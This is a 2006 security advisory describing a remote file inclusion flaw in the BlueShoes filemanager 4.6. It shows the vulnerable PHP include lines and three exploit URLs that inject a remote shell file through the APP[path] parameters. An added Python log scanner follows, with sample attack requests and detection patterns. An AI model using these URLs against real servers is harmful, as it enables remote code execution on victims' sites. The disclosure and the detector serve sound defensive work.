securityvulns SECURITYVULNS:DOC:14870
Oct 31, 2006 - 12:00 a.m.

New Vulnerability

###########################################################

blueshoes-filemanager-4.6_public

$it£ :

www.blueshoes.org
###########################################################

Remote File Include Vulnerability (APP[path][core])

Auth0r : x_w0x

#c0ntact : x_w0x[at]Hotmail[d0t]com
#w£lc0m£ In x0|0x
#=======================================================
#C0d£ :

-file.php
require_once($APP['path']['core'] . 'util/Bs_UnitConverter.class.php');
require_once($APP['path']['core'] . 'net/http/Bs_Browscap.class.php');

-global.conf.php
include_once($APP['path']['bsRoot'] . 'blueshoes.ini.php');

-viewer.php
require_once($APP['path']['core'] . 'file/Bs_FileSystem.class.php');
require_once($APP['path']['core'] . 'file/Bs_FileUtil.class.php');

#£xpl0it:

http://host.com/[path]/applications/flemanager/file.php?APP[path][core]=$h£ll.txt?
http://host.com/[path]/applications/flemanager/global.conf.php?APP[path][bsRoot]=$h£ll.txt?
http://host.com/[path]/applications/flemanager/viewer.php?APP[path][bsRoot]=$h£ll.txt?

Gr££tz : makoki , azzcoder ,xoron , osm@n
$p£cial Gr££tz : str0k ,elite-team and all H4ck£r$ 0_°

Ramadan Karima all musulmano ^_*

Download :http://download.blueshoes.org/blueshoes-filemanager-4.6_public.zip
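
For defenders reviewing web server logs, the following added example (not part of the original advisory or of BlueShoes) flags requests to the three scripts listed above that supply an APP[path][core] or APP[path][bsRoot] parameter, which should only ever be set server-side. The combined log format, the sample lines, the /bs/ prefix and the function names are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script names and array keys are the ones listed in the advisory.
SCRIPTS = {"file.php", "global.conf.php", "viewer.php"}
APP_PATH_PARAM = re.compile(r"^APP\[path\]\[(?:core|bsRoot)\]$")
# Values that would make PHP fetch the included file through a stream wrapper.
REMOTE_VALUE = re.compile(r"^\s*(?:(?:https?|ftps?|php)://|data:)", re.I)
# Request field of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines; hosts, prefix and sizes are made up.
SAMPLE = [
    '198.51.100.7 - - [31/Oct/2006:10:00:01 +0000] "GET /bs/applications/flemanager/file.php?dir=docs HTTP/1.1" 200 5120',
    '198.51.100.9 - - [31/Oct/2006:10:00:05 +0000] "GET /bs/applications/flemanager/file.php?APP[path][core]=http://example.invalid/x.txt? HTTP/1.1" 200 312',
    '198.51.100.9 - - [31/Oct/2006:10:00:09 +0000] "GET /bs/applications/flemanager/viewer.php?APP%5Bpath%5D%5BbsRoot%5D=/tmp/ HTTP/1.1" 500 0',
]


def classify(log_line):
    """Return None, 'override' or 'remote-include' for one access log line."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if url.path.rsplit("/", 1)[-1] not in SCRIPTS:
        return None
    verdict = None
    # parse_qsl percent-decodes names and values, so APP%5Bpath%5D... matches too.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if APP_PATH_PARAM.match(name):
            if REMOTE_VALUE.search(value):
                return "remote-include"
            verdict = "override"  # client-supplied include path, local value
    return verdict


def scan(lines):
    """Return (line_number, verdict) for every flagged line, 1-indexed."""
    hits = []
    for number, line in enumerate(lines, start=1):
        verdict = classify(line)
        if verdict:
            hits.append((number, verdict))
    return hits


if __name__ == "__main__":
    for number, verdict in scan(SAMPLE):
        print(number, verdict)
```

Only the query string is visible in an access log, so the same parameter sent in a POST body or cookie would not be caught by this check.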

